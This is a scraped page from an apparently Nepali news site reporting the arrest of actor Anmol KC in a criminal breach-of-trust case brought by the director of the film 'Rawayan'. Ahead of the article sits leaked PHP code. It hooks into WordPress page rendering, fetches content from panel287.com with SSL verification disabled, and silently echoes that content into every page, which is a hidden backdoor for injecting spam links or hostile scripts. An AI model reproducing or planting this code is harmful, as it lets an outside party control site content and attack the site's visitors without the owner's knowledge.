if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} अपराधिक विश्वासघात’को मुद्दामा पक्राउ परे अनमोल केसी – Toppo Khim

अपराधिक विश्वासघात’को मुद्दामा पक्राउ परे अनमोल केसी

नेपाली फिल्म क्षेत्रका चर्चित नायक अनमोल केसीलाई प्रहरीले पक्राउ गरेको छ । प्रहरीले आज उनलाई काभ्रेको साँगाबाट पक्राउ गरेको श्रोतले बताएको छ । अहिले उनलाई प्रहरीले काठमाडौं ल्याइरहेको छ ।

अनमोलले फिल्म ‘रावायण’मा काम गर्ने पक्का गरेर अन्तिम अवस्थामा काम नगर्ने बताएका थिए । जसकाकारण, फिल्मका निर्देशक सुदर्शन थापा र उनको निर्माण कम्पनीले ‘अपराधिक विश्वासघात’को मुद्दा दायर गरेको थियो ।

सोही उजुरीको आधारमा एसपी मिलन केसी र इन्स्पेक्टर हरि बस्नेतको नेतृत्वको टिमले अनमोललाई पक्राउ गरेको हो ।

अनमोललाई अपराध अनुसन्धान, महाशाखामा प्रहरीले ल्याइसकेको छ । अनमोलले फिल्म ‘रावायण’मा कहिले आफू काम गर्ने बताउँदै निर्देशक सुदर्शन थापालाई तयार रहन भन्ने गरेका थिए भने कहिले आफूले काम गर्न नसक्ने बताउँदै आएका थिए । निर्देशक थापा र उनको ब्यानरले अनमोलका कारण ठूलो आर्थिक तथा अन्य क्षती भएको भन्दै चार दिन अघि अपराध अनुसन्धान विभाग, नयाँ बाँनेश्वरमा जाहेरी दर्खास्त दिएको थियो । निर्मात्री सुप्रिया कटुवालले जाहेरी दर्खास्त दिएकी हुन् ।

यसपछि, प्रहरीले अनमोललाई बारम्बार सम्पर्क गर्दै कार्यलयमा उपस्थित हुनका लागि बोलाएको थियो । तर, अनमोलले आफै मिलाउने तर प्रहरी कार्यलयमा आउन आवश्यक नभएको जवाफ दिएका थिए । प्रहरी कार्यलयबाट पनि यो विवाद समाधान हुन नसक्ने अवस्था भएपछि उनलाई पक्राउ पुर्जी जारी गरिएको थियो ।

अनमोलले केही दिन अगाडि मात्र कसैको दबाबमा आफूले फिल्ममा काम नगर्ने भन्दै स्टाटस लेखेका थिए । अनमोलले बिहिबार मात्र कालिञ्चोकको तस्वीर स्टोरीमा अपलोड गरेका थिए । आज, उनी कालिञ्चोकबाट काठमाडौं फर्कदै गर्दा काभ्रेको साँगाबाट पक्राउ परेका हुन् ।

Comments (0)
Add Comment